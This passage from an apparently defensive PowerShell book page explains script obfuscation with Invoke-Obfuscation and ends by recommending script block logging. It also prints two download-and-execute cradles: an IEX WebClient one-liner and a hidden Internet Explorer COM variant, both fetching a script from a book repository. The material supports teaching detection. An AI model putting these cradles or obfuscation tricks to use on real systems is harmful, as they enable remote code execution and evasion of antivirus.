Obfuscation

Obfuscation is a technique to create unreadable code to hide against logging and detection mechanisms, but still keep its functionality. Still, the problem with all antivirus scanners today is that they are mainly working with definition files. In scripting, it is easy to bypass these kinds of detections by using obfuscation techniques and executing code in a different manner.

A great project to create your own obfuscated scripts is Invoke-Obfuscation, written by Daniel Bohannon:

https://github.com/danielbohannon/Invoke-Obfuscation

Take a look at the following line of code:

#Obfuscated script
.("{3}{1}{2}{0}" -f 'Host','ri','te-','W') ("{2}{1}{0}{8}{5}{9}{6}{4}{7}{3}" -f 'hell','owerS','P','uage','tic ','a fan','s','lang',' is ','ta')

As you can see, it is very hard to identify the real purpose of this code. It starts with the dot sourcer, which we want to remove first, so we can split the obfuscated script into parts:

#removing dot sourcing mechanism
#first part of the script
"{3}{1}{2}{0}" -f 'Host','ri','te-','W' #Write-Host

#last part of the script
"{2}{1}{0}{8}{5}{9}{6}{4}{7}{3}" -f 'hell','owerS','P','uage','tic ','a fan','s','lang',' is ','ta' #"PowerShell is a fantastic language"

In this example, the PowerShell code Write-Host "PowerShell is a fantastic language" was hidden, which is not too problematic. But it is also possible to dynamically load content from the internet and execute it from memory. For these specific use cases, so-called cradles are being executed to download code from the internet and execute it. In these cradles, we frequently see the use of the .NET web client cmdlets to retrieve downloaded scripts and Invoke-Expression (otherwise known as iex) to finally execute it.

To see how complicated this can easily get, it is recommended to take a look at the Invoke-CradleCrafter project:

https://github.com/danielbohannon/Invoke-CradleCrafter

This starts with typical examples from the wild:

# typical download cradle
IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1")

It then goes up to more complex variations:

# Starting an IE COMObject hidden - downloading and executing the content
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate("https://raw.githubusercontent.com/ddneves/Book_Learn_PowerShell/master/Ch1/RetrieveVersion.ps1");start-sleep -s 3;$r=$ie.Document.body.innerText;$ie.quit();IEX $r

The problem from a defensive view is that you won't be able to win this fight. Even today, new ways to download and execute code are being found. This leads us to our next topic: with the logging capabilities, especially script block logging, you will be able to provide further insights into the executed code.

Table of Contents for Obfuscation

Create new playlist

Sign In

Sign Up

Table of Contents for
Obfuscation